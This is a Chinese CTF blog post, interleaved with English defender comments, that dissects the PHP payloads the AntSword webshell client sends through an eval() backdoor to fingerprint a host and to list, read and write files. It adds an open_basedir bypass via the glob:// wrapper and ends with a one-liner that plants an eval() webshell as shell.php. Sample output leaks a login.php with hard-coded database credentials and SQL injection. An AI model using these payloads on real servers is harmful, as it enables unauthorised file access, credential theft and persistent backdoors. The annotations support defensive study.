前段时间打ctf的时候突然发现,有时候我们getshell了,但是由于服务器大部分时候会禁用shell函数,我们往往只能使用eval(),一般意义来说,我们可以通过菜刀、蚁剑这样的工具,但是如果我们的shell是通过文件包含的方式建立的,工具经常没法用,临时用php函数读文件、写文件还得再查一查,所以今天分析下蚁剑的列目录、读文件方式,需要的时候可以直接来用
我是通过分析蚁剑的语句来列出的,毕竟菜刀不支持php7
查看当前目录&查看服务器信息
代码语言:javascript复制@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("A","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "}:=-";die();
整理下格式
代码语言:javascript复制@ini_set("display_errors", "0");
// Stage 1 of the AntSword (蚁剑) PHP payload: fingerprint the host. It reports the
// web root, the drive letters present (Windows) or "/" (Unix), php_uname() and the
// user PHP runs as. Defender note: every stage on this page wraps its output in the
// fixed markers "-=:{" ... "}:=-"; those constant strings in a response body are a
// usable detection signature, as is the base64-encoded $_POST field used by the
// later stages.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
// Web root: directory of the executing script, falling back to PATH_TRANSLATED.
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D} ";
// A path not starting with "/" is presumably taken to mean Windows: probe which
// drive letters A:..Z: exist. Otherwise just report "/".
if(substr($D,0,1)!="/"){
foreach(range("A","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}
else{
$R.="/";
}
$R.=" ";
// Effective user: posix_getpwuid(posix_geteuid()) when the posix extension is
// present (note the guard tests posix_getegid, a different function from the two
// actually called), else get_current_user(). This user is what bounds the later
// directory/file stages, so the PHP worker should run as a dedicated
// low-privilege account.
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.=" {$s}";
echo $R;;
echo "}:=-";
die();
我们来看看返回
代码语言:javascript复制-=:{/home/wwwroot/default / Linux iZ285ei82c1Z 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 www}:=-
列目录
代码语言:javascript复制@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$D=base64_decode($_POST["0xbad31815"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo "}:=-";die();
修改下格式
代码语言:javascript复制@ini_set("display_errors", "0");
// Stage 2: directory listing. The target directory arrives base64-encoded in a
// $_POST field whose name ("0xbad31815") appears to be generated by the client, so
// request logs show a short base64 blob under an opaque key rather than a path;
// decode such fields when triaging suspicious POSTs to an eval()-reachable script.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
$D=base64_decode($_POST["0xbad31815"]);
$F=@opendir($D);
if($F==NULL){
// Fixed error string: a second constant worth matching on.
echo("ERROR:// Path Not Found Or No Permission!");
}
else{
// $M collects directories (name + "/"), $L plain files; directories are printed first.
$M=NULL;
$L=NULL;
// readdir() also yields "." and ".." (visible as "./" in the sample output below).
while($N=@readdir($F)){
$P=$D."/".$N;
// Per entry: mtime, size in bytes, last four octal digits of the mode.
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R=" ".$T." ".@filesize($P)." ".$E."
";
if(@is_dir($P))
$M.=$N."/".$R;
else $L.=$N.$R;
}
echo $M.$L;
@closedir($F);
};
echo "}:=-";
die();
看看返回什么
代码语言:javascript复制-=:{aaaj7/ 2016-04-20 23:36:31 4096 0755
./ 2016-05-12 19:59:42 4096 0755
aaaj5/ 2016-04-11 20:19:09 4096 0755
aaaj6/ 2016-03-20 20:50:35 4096 0755
xss/ 2016-02-11 12:10:56 4096 0755
nweb1/ 2016-04-05 12:40:34 4096 0755
aaaj1/ 2016-04-11 19:15:06 4096 0755
web_aaa/ 2015-10-27 13:18:09 4096 0755
aaa_final/ 2015-12-21 14:25:49 4096 0755
aaaj3/ 2016-04-11 19:20:56 4096 0755
aaaj.bak/ 2016-03-15 13:47:09 4096 0755
mbWebTraffic/ 2015-10-10 23:44:46 4096 0755
web1/ 2015-12-20 16:04:36 4096 0755
web2/ 2015-11-05 22:41:19 4096 0755
web3/ 2015-11-05 22:46:17 4096 0755
aaaj2/ 2016-03-14 14:25:00 4096 0755
sctfq1/ 2016-04-11 15:22:00 4096 0755
CI/ 2015-12-21 13:32:32 4096 0755
aaaj4/ 2016-04-11 19:28:24 4096 0755
nweb/ 2016-04-03 21:01:51 4096 0755
web50/ 2015-12-01 15:51:02 4096 0775
websocket/ 2016-03-27 15:19:00 4096 0755
xsstmp/ 2016-01-27 22:26:40 4096 0755
table/ 2015-11-18 19:31:05 4096 0755
9d8cb6817c34555064ffc486e5a53d8e.jpg 2015-11-07 13:29:39 114461 0644
}:=-
看得出来做得很清晰
里面还有个字段$_POST["0xbad31815"]=L2hvbWUvd3d3cm9vdC9kZWZhdWx0Lw==,解码后就是所列的目录
读文件
代码语言:javascript复制a=@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$F=base64_decode($_POST["0xbad31815"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo "}:=-";die();{
代码语言:javascript复制a=@ini_set("display_errors", "0");
// Stage 3: read a file. The path again comes base64-encoded in $_POST["0xbad31815"]
// and the whole file is echoed raw between the markers. This is why secrets kept in
// web-root source (the DB credentials in the login.php shown below) are exposed by
// any arbitrary-file-read primitive: keep configuration secrets out of the document
// root, and rotate them once such a read is suspected.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
$F=base64_decode($_POST["0xbad31815"]);
$P=@fopen($F,"r");
// filesize() is not "@"-suppressed; display_errors=0 set above hides its warning anyway.
echo(@fread($P,filesize($F)));
@fclose($P);;
echo "}:=-";
die();
{
返回
代码语言:javascript复制-=:{<?php
// Sample target login.php as returned by the read-file stage. It has several
// defects worth calling out for anyone reviewing similar code:
//   - both SQL statements are built by string concatenation from request data
//     (SQL injection); use mysqli prepared statements with bound parameters;
//   - credentials are hard-coded in a file under the web root, so a file read
//     leaks them (rotate them once such a read is suspected);
//   - passwords are compared as unsalted md5; use password_hash()/password_verify().
$user=trim($_POST['user']);
$pass=md5(trim($_POST['pass']));
$userid=$_COOKIE['userid']; // cookie value later used unvalidated in the UPDATE below
$db = new mysqli('localhost','xx','sGya3fFLx8zPXe','xx1');
// BUG: $password has not been assigned yet at this point (it is first set from the
// result row below), so this clause compares against an empty string; $pass, the
// hash just computed, is never used in the query.
$query="select password from users where username = '".$user."' and password = '".$password."'";
$result=$db->query($query);
$result_num=$result->num_rows;
if($result_num==0)
{
echo "<script>alert('Something Error!')</script>";
echo "<script>window.location.href='./welcome.php'</script>";
}
else
{
$row=$result->fetch_assoc();
$password=$row['password'];
// BUG: single "=" assigns instead of comparing, so this branch is taken for any
// non-empty stored password; it should be a strict comparison (or password_verify()).
if($pass=$password)
{
$query = "update users set lastcookie = '".$userid."' where username = '".$user."'";
$result = $db->query($query);
header("location:./user.php");
}
else
{
echo "<script>alert('Something Error!')</script>";
echo "<script>window.location.href='./welcome.php'</script>";
}
}
?>
}:=-
当然读的文件地址是$_POST["0xbad31815"] = L2hvbWUvd3d3cm9vdC9kZWZhdWx0L2hjdGZqMS9sb2dpbi5waHA=
写文件
代码语言:javascript复制a=@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";echo @fwrite(fopen(base64_decode($_POST["0xbad31815"]),"w"),base64_decode($_POST["0xa7418ec4"]))?"1":"0";;echo "}:=-";die();
代码语言:javascript复制a=@ini_set("display_errors", "0");
// Stage 4: write a file. Both the path and the content arrive base64-encoded in
// $_POST fields; the client-supplied bytes are written verbatim and "1"/"0" reports
// whether fwrite() wrote anything. The fopen() handle is never closed explicitly
// (released when the script exits). Defender note: this is the stage that modifies
// the web root, so file-integrity monitoring on code directories and a PHP worker
// without write permission to them are the controls that matter here.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
echo @fwrite(fopen(base64_decode($_POST["0xbad31815"]),"w"),base64_decode($_POST["0xa7418ec4"]))?"1":"0";;
echo "}:=-";
die();
写的文件地址还是$_POST["0xbad31815"] = L2hvbWUvd3d3cm9vdC9kZWZhdWx0L2hjdGZqMS9sb2dpbi5waHA=
写的文件内容
代码语言:javascript复制$_POST["0xa7418ec4"] = PD9waHANCgkkdXNlcj10cmltKCRfUE9TVFsndXNlciddKTsNCgkkcGFzcz1tZDUodHJpbSgkX1BPU1RbJ3Bhc3MnXSkpOw0KCSR1c2VyaWQ9JF9DT09LSUVbJ3VzZXJpZCddOw0KDQoJICRkYiA9IG5ldyBteXNxbGkoJ2xvY2FsaG9zdCcsJ3dlYjExMScsJ3NHeWEzZkZMajV1OHpQWGUnLCdoY3Rmd2ViMScpOw0KDQoJJHF1ZXJ5PSJzZWxlY3QgcGFzc3dvcmQgZnJvbSB1c2VycyB3aGVyZSB1c2VybmFtZSA9ICciLiR1c2VyLiInIGFuZCBwYXNzd29yZCA9ICciLiRwYXNzd29yZC4iJyI7DQoJJHJlc3VsdD0kZGItPnF1ZXJ5KCRxdWVyeSk7DQoJJHJlc3VsdF9udW09JHJlc3VsdC0 bnVtX3Jvd3M7DQoJaWYoJHJlc3VsdF9udW09PTApDQoJew0KCQllY2hvICI8c2NyaXB0PmFsZXJ0KCdTb21ldGhpbmcgRXJyb3IhJyk8L3NjcmlwdD4iOw0KCQllY2hvICI8c2NyaXB0PndpbmRvdy5sb2NhdGlvbi5ocmVmPScuL3dlbGNvbWUucGhwJzwvc2NyaXB0PiI7CQ0KCX0NCg0KCWVsc2UNCgl7DQoJCSRyb3c9JHJlc3VsdC0 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
简单的方式
除了蚁剑这种针对大型服务器的通用写法外,其实不必那么复杂也能获取我们想要的信息
列目录
代码语言:javascript复制a=echo "<br />";$handler = opendir('./');while( ($filename = readdir($handler)) !== false ) {echo $filename."<br/>";}
由于可能有open_basedir的问题,所以需要绕过 http://drops.wooyun.org/tips/3978
代码语言:javascript复制<?php
// Directory listing through the "glob://" stream wrapper on DirectoryIterator, which
// the linked write-up presents as an open_basedir bypass. Defender note:
// open_basedir is a best-effort restriction inside the PHP process, not an isolation
// boundary; rely on per-site OS users / filesystem permissions or containers rather
// than on it.
printf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///home/wwwroot/*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///home/wwwroot/.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
// Merge both passes, sort, and print one entry per line.
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}
?>
读文件
代码语言:javascript复制a=$username=file_get_contents('./4ff692fb12aa996e27f0a108bfc386c2');var_dump($username);
写文件
代码语言:javascript复制file_put_contents("/home/wwwroot/hackme/05d6a8025a7d0c0eee5f6d12a0a94cc9/shell.php",'<?php eval($_POST[1]);?>');